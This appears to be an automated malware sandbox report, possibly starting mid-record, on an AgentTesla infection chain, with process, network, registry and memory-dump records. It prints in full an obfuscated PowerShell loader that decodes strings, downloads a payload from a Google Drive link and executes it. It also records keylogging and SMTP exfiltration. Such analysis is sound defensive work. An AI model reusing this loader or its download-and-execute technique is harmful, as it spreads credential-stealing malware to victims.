NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;"

Details

Is windows:	true
Is dropped:	false
PID:	344
Target ID:	5
Parent PID:	3012
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;"
Size:	433152
MD5:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Time:	08:04:59
Date:	23/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7a0000
Modulesize:	446464
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Invoke-Obfuscation CLIP+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation STDIN+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation VAR+ Launcher	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Details

Is windows:	true
Is dropped:	false
PID:	320
Target ID:	8
Parent PID:	344
Name:	wab.exe
Class:	system-tools
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Size:	516608
MD5:	251E51E2FEDCE8BB82763D39D631EF89
Time:	08:05:21
Date:	23/04/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	false
Is elevated:	false
Modulebase:	0x7b0000
Modulesize:	536576
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Yara detected AgentTesla	Stealing of Sensitive Information, Remote Access Functionality
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sigma detected: Suspicious Outbound SMTP Connections	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	3452
Target ID:	3
Parent PID:	3012
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	08:04:51
Date:	23/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"

Details

Is windows:	true
Is dropped:	false
PID:	6188
Target ID:	4
Parent PID:	3012
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	08:04:53
Date:	23/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff60b260000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"

Details

Is windows:	true
Is dropped:	false
PID:	5704
Target ID:	6
Parent PID:	344
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\SysWOW64\cmd.exe
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
Size:	236544
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Time:	08:05:00
Date:	23/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x790000
Modulesize:	368640
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://pesterbdd.com/images/Pester.png

unknown

https://api.ipify.org/

104.26.13.205

http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#

unknown

https://drive.google.com/mmH

unknown

http://nuget.org/NuGet.exe

unknown

https://sectigo.com/CPS0

unknown

http://drive.usercontent.google.com

unknown

http://ocsp.sectigo.com0

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

https://drive.googP

unknown

https://drive.google.com/5m

unknown

https://drive.usercontent.googh

unknown

https://drive.usercontent.google.com/

unknown

http://drive.google.com

unknown

https://github.com/Pester/Pester

unknown

http://smtp.privateemail.com

unknown

https://www.google.com

unknown

https://aka.ms/pscore6lB

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://drive.google.com

unknown

https://drive.usercontent.google.com

unknown

https://aka.ms/pscore68

unknown

https://apis.google.com

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

There are 18 hidden URLs, click here to show them.

Domains

Name

Malicious

drive.google.com

142.250.81.238

Details

Name:	drive.google.com
IP:	142.250.81.238
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

drive.usercontent.google.com

142.250.64.97

Details

Name:	drive.usercontent.google.com
IP:	142.250.64.97
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

api.ipify.org

104.26.13.205

Details

Name:	api.ipify.org
IP:	104.26.13.205
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
May check the online IP address of the machine	Networking	System Network Configuration Discovery
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Uses secure TLS version for HTTPS connections	Compliance, Networking

smtp.privateemail.com

66.29.159.53

Details

Name:	smtp.privateemail.com
IP:	66.29.159.53
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Suspicious Outbound SMTP Connections	System Summary
Uses SMTP (mail sending)	Networking	Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

142.250.64.97

drive.usercontent.google.com

United States

Details

IP:	142.250.64.97
TargetID:	2
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	15169
ASN name:	GOOGLEUS
Private:	false
Domain:	drive.usercontent.google.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

104.26.13.205

api.ipify.org

United States

Details

IP:	104.26.13.205
TargetID:	8
Current Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	api.ipify.org

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

66.29.159.53

smtp.privateemail.com

United States

Details

IP:	66.29.159.53
TargetID:	8
Current Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Country:	United States
Countrycode:	USA
ASN number:	19538
ASN name:	ADVANTAGECOMUS
Private:	false
Domain:	smtp.privateemail.com

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Suspicious Outbound SMTP Connections	System Summary
Uses SMTP (mail sending)	Networking	Application Layer Protocol

142.250.81.238

drive.google.com

United States

Details

IP:	142.250.81.238
TargetID:	2
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	15169
ASN name:	GOOGLEUS
Private:	false
Domain:	drive.google.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS

FileDirectory

There are 19 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

8930000

direct allocation

page execute and read and write

1D6D36DE000

trusted library allocation

page read and write

23987000

trusted library allocation

page read and write

C494000

direct allocation

page execute and read and write

5C82000

trusted library allocation

page read and write

23961000

trusted library allocation

page read and write

25F50000

trusted library allocation

page read and write

1D6DBE76000

heap

page read and write

1F5000

heap

page read and write

720D000

stack

page read and write

7FF848E24000

trusted library allocation

page read and write

7FF848FD1000

trusted library allocation

page read and write

25F18000

trusted library allocation

page read and write

1D6C53CD000

trusted library allocation

page read and write

25FEF000

stack

page read and write

5A54000

remote allocation

page execute and read and write

76A0000

trusted library allocation

page read and write

1D6C52E6000

trusted library allocation

page read and write

25BF7000

heap

page read and write

2A4C82C9000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C41CD000

trusted library allocation

page read and write

1E886230000

heap

page read and write

7FF8490E0000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

491E000

stack

page read and write

2ED0000

heap

page read and write

25F10000

trusted library allocation

page read and write

1F5000

heap

page read and write

2AFE000

stack

page read and write

1F4000

heap

page read and write

23640000

direct allocation

page read and write

1F4000

heap

page read and write

7730000

heap

page execute and read and write

25ED0000

trusted library allocation

page read and write

1F4000

heap

page read and write

56F000

heap

page read and write

A694000

direct allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF849140000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C52B5000

trusted library allocation

page read and write

1E0000

heap

page read and write

1F4000

heap

page read and write

25F10000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

703E7E000

stack

page read and write

7FF849170000

trusted library allocation

page read and write

1D6C41BF000

trusted library allocation

page read and write

25EE0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4CA1E0000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C586A000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

26830000

trusted library allocation

page read and write

1F4000

heap

page read and write

76E0000

trusted library allocation

page read and write

7FF849090000

trusted library allocation

page read and write

267EB000

trusted library allocation

page read and write

1D6D3680000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1D6C4CB5000

trusted library allocation

page read and write

1E886280000

heap

page read and write

25EF0000

trusted library allocation

page read and write

25ED0000

trusted library allocation

page read and write

2A4C82FA000

heap

page read and write

1D6C5627000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

2A4CA1E4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1E8864A5000

heap

page read and write

C0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

748E000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

25AF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

234FE000

stack

page read and write

25AA0000

trusted library allocation

page read and write

1F4000

heap

page read and write

23B3B000

trusted library allocation

page read and write

1E88628B000

heap

page read and write

1F4000

heap

page read and write

7FF8490D0000

trusted library allocation

page read and write

26830000

trusted library allocation

page read and write

2CBD000

stack

page read and write

25F30000

trusted library allocation

page read and write

7FF849100000

trusted library allocation

page read and write

1F4000

heap

page read and write

26810000

trusted library allocation

page read and write

26830000

trusted library allocation

page read and write

90E0000

direct allocation

page execute and read and write

1F4000

heap

page read and write

1D6DBB21000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

3050000

heap

page read and write

25F2D000

stack

page read and write

1D6DB67B000

heap

page read and write

238CE000

trusted library allocation

page read and write

8320000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1D6C1B85000

heap

page read and write

1D6C58A3000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26840000

trusted library allocation

page read and write

1F4000

heap

page read and write

74B1000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

2F50000

heap

page read and write

1F4000

heap

page read and write

25BBE000

heap

page read and write

150000

heap

page read and write

1F4000

